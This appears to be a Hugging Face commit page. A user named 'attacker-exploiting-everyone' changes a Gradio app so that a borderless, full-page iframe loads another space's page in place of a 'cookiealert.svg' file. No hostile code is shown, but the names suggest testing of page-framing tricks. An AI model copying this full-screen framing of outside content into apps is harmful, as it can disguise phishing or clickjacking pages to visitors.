attacker-exploiting-everyone commited on
Commit
330d3ad
·
verified ·
1 Parent(s): b80c505

Update app.py

Browse files
Files changed (1) hide show
  1. app.py +1 -1
app.py CHANGED
@@ -3,7 +3,7 @@ import gradio as gr
3
  def greet():
4
  # Inject iframe to load the page and fill 100% of the page
5
  iframe_code = '''
6
- <iframe src="https://images.ctfassets.net/h0jtq0wdx190/341SWgdQBFyojWidgWy2PF/4984f79697c098a3c1abf7f085524a55/cookiealert.svg"
7
  style="width: 100%; height: 100vh; border: none;"></iframe>
8
  '''
9
  return iframe_code
 
3
  def greet():
4
  # Inject iframe to load the page and fill 100% of the page
5
  iframe_code = '''
6
+ <iframe src="https://attacker-exploiting-everyone-testingspace.static.hf.space/index.html"
7
  style="width: 100%; height: 100vh; border: none;"></iframe>
8
  '''
9
  return iframe_code